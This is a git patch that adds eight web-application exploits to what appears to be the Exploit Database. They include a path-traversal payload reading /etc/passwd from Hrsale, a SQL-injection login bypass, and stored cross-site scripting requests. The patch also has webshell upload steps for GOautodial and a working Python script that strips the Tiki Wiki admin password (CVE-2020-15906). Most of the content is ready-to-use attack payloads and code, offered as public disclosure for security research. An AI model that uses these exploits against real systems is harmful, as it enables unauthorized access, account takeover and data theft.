From 1539c20e48e08fbd2ec030b5d072b9ffe8e8d48c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 22 Oct 2020 05:02:10 +0000 Subject: [PATCH] DB: 2020-10-22 8 changes to exploits/shellcodes Hrsale 2.0.0 - Local File Inclusion School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC School Faculty Scheduling System 1.0 - Authentication Bypass POC GOautodial 4.0 - Authenticated Shell Upload Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting Tiki Wiki CMS Groupware 21.1 - Authentication Bypass --- exploits/php/webapps/48920.txt | 15 ++++++ exploits/php/webapps/48921.txt | 43 ++++++++++++++++ exploits/php/webapps/48922.txt | 31 ++++++++++++ exploits/php/webapps/48923.txt | 17 +++++++ exploits/php/webapps/48924.txt | 85 ++++++++++++++++++++++++++++++++ exploits/php/webapps/48925.txt | 47 ++++++++++++++++++ exploits/php/webapps/48926.txt | 44 +++++++++++++++++ exploits/php/webapps/48927.py | 90 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 8 +++ 9 files changed, 380 insertions(+) create mode 100644 exploits/php/webapps/48920.txt create mode 100644 exploits/php/webapps/48921.txt create mode 100644 exploits/php/webapps/48922.txt create mode 100644 exploits/php/webapps/48923.txt create mode 100644 exploits/php/webapps/48924.txt create mode 100644 exploits/php/webapps/48925.txt create mode 100644 exploits/php/webapps/48926.txt create mode 100755 exploits/php/webapps/48927.py diff --git a/exploits/php/webapps/48920.txt b/exploits/php/webapps/48920.txt new file mode 100644 index 000000000..5c233471c --- /dev/null +++ b/exploits/php/webapps/48920.txt @@ -0,0 +1,15 @@ +# Exploit Title: Hrsale 2.0.0 - Local File Inclusion +# Date: 10/21/2020 +# Exploit Author: Sosecure +# Vendor Homepage: https://hrsale.com/index.php +# Version: version 2.0.0 + +Description: +This exploit allow you to download any readable file from server with out permission and login session. + +Payload : + https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd +POC: + + 1. Access to HRsale application and browse to download path with payload + 2. Get /etc/passwd \ No newline at end of file diff --git a/exploits/php/webapps/48921.txt b/exploits/php/webapps/48921.txt new file mode 100644 index 000000000..06c34fcda --- /dev/null +++ b/exploits/php/webapps/48921.txt @@ -0,0 +1,43 @@ +# Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting +# Date: 21/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin/index.php?page=courses + +Step 2: use payload in Course and Description field + +Malicious Request + +POST /schoolFSS/scheduling/admin/ajax.php?action=save_course HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------168636252127671582243354784793 +Content-Length: 478 +Origin: http://localhost +Connection: close +Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=courses +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re + +-----------------------------168636252127671582243354784793 +Content-Disposition: form-data; name="id" + + +-----------------------------168636252127671582243354784793 +Content-Disposition: form-data; name="course" + + +-----------------------------168636252127671582243354784793 +Content-Disposition: form-data; name="description" + + +-----------------------------168636252127671582243354784793-- + +Step 3: Cookie will be reflected each time someone visits the Course List section. \ No newline at end of file diff --git a/exploits/php/webapps/48922.txt b/exploits/php/webapps/48922.txt new file mode 100644 index 000000000..37ac58d4b --- /dev/null +++ b/exploits/php/webapps/48922.txt @@ -0,0 +1,31 @@ +# Exploit Title: School Faculty Scheduling System 1.0 - Authentication Bypass +# Date: 21/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin + +Step 2: use payload jyot' or 1=1# in user and password field + +Malicious Request + +POST /schoolFSS/scheduling/admin/ajax.php?action=login HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 55 +Origin: http://localhost +Connection: close +Referer: http://localhost/schoolFSS/scheduling/admin/login.php +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re + +username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23 + +Step 3: You will be logged in as admin. \ No newline at end of file diff --git a/exploits/php/webapps/48923.txt b/exploits/php/webapps/48923.txt new file mode 100644 index 000000000..44f1fc50a --- /dev/null +++ b/exploits/php/webapps/48923.txt @@ -0,0 +1,17 @@ +# Exploit Title: GOautodial 4.0 - Authenticated Shell Upload +# Author: Balzabu +# Discovery Date: 07-23-2020 +# Vendor Homepage: https://goautodial.org/ +# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html +# Tested Version: 4.0 (Last relase as of today) +# Tested on OS: CentOS 7 + +# STEPS TO REPRODUCE: + +1 - Log in as an agent +2 - Write a new message to user goadmin with random subject and text +3 - Attach your webshell to the message +4 - Access your shell at +https://www.foo.com/uploads/year/month/shellname.php ( Example: +https://XXX.XXX.XXX.XXX/uploads/2020/07/shell.php ) +5 - Priv esc and enjoy ... :-) \ No newline at end of file diff --git a/exploits/php/webapps/48924.txt b/exploits/php/webapps/48924.txt new file mode 100644 index 000000000..3b75d932c --- /dev/null +++ b/exploits/php/webapps/48924.txt @@ -0,0 +1,85 @@ +# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Product Name) +# Exploit Author: Adeeb Shah (@hyd3sec) +# Date: August 2, 2020 +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html +# Version: 1.0 +# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 + + +# Vulnerability Details +# Description A persistent cross-site scripting vulnerability exists within the 'Product Name' parameter in the Edit Product function. +# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Product Name value expected. + +#Steps: + + 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit) + + 2. Click "Product" + + 3. Click "Action" in any categories name row + + 4. Click Edit, then Product Info (tab) + + 5. In "Product Name" field enter XSS + + 6. Click save changes + + 7. Any page on the webapp expecting that 'Product Name' will trigger the XSS. + + + +POST /stock/php_action/editProduct.php HTTP/1.1 +Host: 192.168.222.132 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.222.132/stock/product.php +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------147762840819880874581057152477 +Content-Length: 938 +DNT: 1 +Connection: close +Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8 + + +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editProductName" + + + +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editQuantity" + + +9 +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editRate" + + + +1200 +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editBrandName" + + +12 +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editCategoryName" + + + +7 +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editProductStatus" + + + +1 +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="productId" + + +8 +-----------------------------147762840819880874581057152477-- \ No newline at end of file diff --git a/exploits/php/webapps/48925.txt b/exploits/php/webapps/48925.txt new file mode 100644 index 000000000..adb213327 --- /dev/null +++ b/exploits/php/webapps/48925.txt @@ -0,0 +1,47 @@ +# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Categories Name) +# Exploit Author: Adeeb Shah (@hyd3sec) +# Date: August 2, 2020 +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html +# Version: 1.0 +# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 + + +# Vulnerability Details +# Description A persistent cross-site scripting vulnerability exists within the 'Categories Name' parameter in the edit brand function. +# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Categories Name value expected. + +#Steps: + + 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit) + + 2. Click "Category" + + 3. Click "Action" in any categories name row + + 4. Click Edit + + 5. In "Categories Name" field enter XSS + + 6. Click save changes + + 7. Any page on the webapp expecting that 'Categories Name' will trigger the XSS. + +POST /stock/php_action/editCategories.php HTTP/1.1 +Host: 192.168.222.132 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.222.132/stock/categories.php +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 102 +DNT: 1 +Connection: close +Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8 + + + + +editCategoriesName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editCategoriesStatus=1&editCategoriesId=9 \ No newline at end of file diff --git a/exploits/php/webapps/48926.txt b/exploits/php/webapps/48926.txt new file mode 100644 index 000000000..4e45f1f03 --- /dev/null +++ b/exploits/php/webapps/48926.txt @@ -0,0 +1,44 @@ +# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Brand Name) +# Exploit Author: Adeeb Shah (@hyd3sec) +# Date: August 2, 2020 +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html +# Version: 1.0 +# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 + + +# Vulnerability Details +# Description A persistent cross-site scripting vulnerability exists within the 'Brand Name' parameter in the edit brand function. +# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Brand Name value expected. + +#Steps: + + 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit) + + 2. Click "Brand" + + 3. Click "Action" in any brand name row + + 4. Click Edit + + 5. In "Brand Name" field enter XSS + + 6. Click save changes + + 7. Any page on the webapp expecting that 'Brand Name' will trigger the XSS. + +POST /stock/php_action/editBrand.php HTTP/1.1 +Host: 192.168.222.132 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.222.132/stock/brand.php +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 78 +DNT: 1 +Connection: close +Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8 + +editBrandName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editBrandStatus=1&brandId=14 \ No newline at end of file diff --git a/exploits/php/webapps/48927.py b/exploits/php/webapps/48927.py new file mode 100755 index 000000000..64ec94583 --- /dev/null +++ b/exploits/php/webapps/48927.py @@ -0,0 +1,90 @@ +# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass +# Date: 01.08.2020 (1st August 2020) +# Exploit Author: Maximilian Barz aka. Silky +# Vendor Homepage: tiki.org +# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip +# Version: 21.1 +# Tested on: Kali Linux 5.7.0-kali1-amd64 + +#!/usr/bin/env/python3 +import requests +import json +import lxml.html +import sys + +banner = ''' + +████████ ██ ██  ██ ██ ██  ██ ██ ██  ██ ██  ██████  ██  ██  +   ██    ██ ██  ██  ██ ██  ██ ██ ██  ██  ██       ██ ███  ███  + ██  ██ █████   ██ ██  █  ██ ██ █████   ██  █████   ██   ██  + ██  ██ ██  ██  ██ ██ ███ ██ ██ ██  ██  ██  ██      ██  ██  + ██  ██ ██  ██ ██  ███ ███  ██ ██  ██ ██  ███████  ██ ██ ██  +                                                             + + █████  ██  ██ ████████ ██  ██ ███████ ███  ██ ████████ ██  ██████  █████  ████████ ██  ██████  ███  ██  ██████  ██  ██ ██████  █████  ███████ ███████  +██   ██ ██  ██    ██    ██  ██ ██      ████  ██    ██    ██ ██      ██   ██    ██    ██ ██    ██ ████  ██  ██   ██  ██  ██  ██   ██ ██   ██ ██      ██       +███████ ██  ██  ██  ███████ █████  ██ ██  ██  ██  ██ ██  ███████  ██  ██ ██  ██ ██ ██  ██  ██████    ████   ██████  ███████ ███████ ███████  +██   ██ ██  ██  ██  ██   ██ ██     ██  ██ ██  ██  ██ ██  ██   ██  ██  ██ ██  ██ ██  ██ ██  ██   ██   ██   ██      ██   ██      ██      ██  +██  ██  ██████   ██  ██  ██ ███████ ██   ████  ██  ██  ██████ ██  ██  ██  ██  ██████  ██   ████   ██████   ██  ██  ██  ██ ███████ ███████  +                                                                                                                                             +Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337 +''' + + + + +def main(): + if(len(sys.argv) < 2): + print(banner) + print("Usage: %s " % sys.argv[0]) + print("Eg: %s 1.2.3.4 " % sys.argv[0]) + return + + + rhost = sys.argv[1] + url = "http://"+rhost+"/tiki/tiki-login.php" + + session = requests.Session() + + def get_ticket(): + r = requests.get(url) + login_page = r.text.encode('utf-8') + html = lxml.html.fromstring(login_page) + auth = html.xpath('//input[@name="ticket"]/@value') + + return str(auth)[2:-2] + + def get_cookie(): + session.get(url) + return session.cookies.get_dict() + + + cookie = get_cookie() + ticket = get_ticket() + + payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'} + headers = { + 'Host': rhost, + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzrhost, deflate', + 'Referer': 'http://'+rhost+'/tiki/tiki-login.php', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Content-Length': '125', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + 'Cache-Control': 'max-age=0', + } + + + for i in range(60): + r = session.post(url, payload, headers) + if("Account requires administrator approval." in r.text): + print("Admin Password got removed.") + print("Use BurpSuite to login into admin without a password ") + + + +if(__name__ == '__main__'): + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ba10c71d9..ab5e87ad1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -40738,6 +40738,14 @@ id,file,description,date,author,type,platform,port 48917,exploits/java/webapps/48917.py,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution",2020-10-20,"Jonatas Fil",webapps,java, 48918,exploits/php/webapps/48918.sh,"WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection",2020-10-20,"Jonatas Fil",webapps,php, 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple, +48920,exploits/php/webapps/48920.txt,"Hrsale 2.0.0 - Local File Inclusion",2020-10-21,Sosecure,webapps,php, +48921,exploits/php/webapps/48921.txt,"School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC",2020-10-21,"Jyotsna Adhana",webapps,php, +48922,exploits/php/webapps/48922.txt,"School Faculty Scheduling System 1.0 - Authentication Bypass POC",2020-10-21,"Jyotsna Adhana",webapps,php, +48923,exploits/php/webapps/48923.txt,"GOautodial 4.0 - Authenticated Shell Upload",2020-10-21,Balzabu,webapps,php, +48924,exploits/php/webapps/48924.txt,"Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php, +48925,exploits/php/webapps/48925.txt,"Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php, +48926,exploits/php/webapps/48926.txt,"Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php, +48927,exploits/php/webapps/48927.py,"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass",2020-10-21,"Maximilian Barz",webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,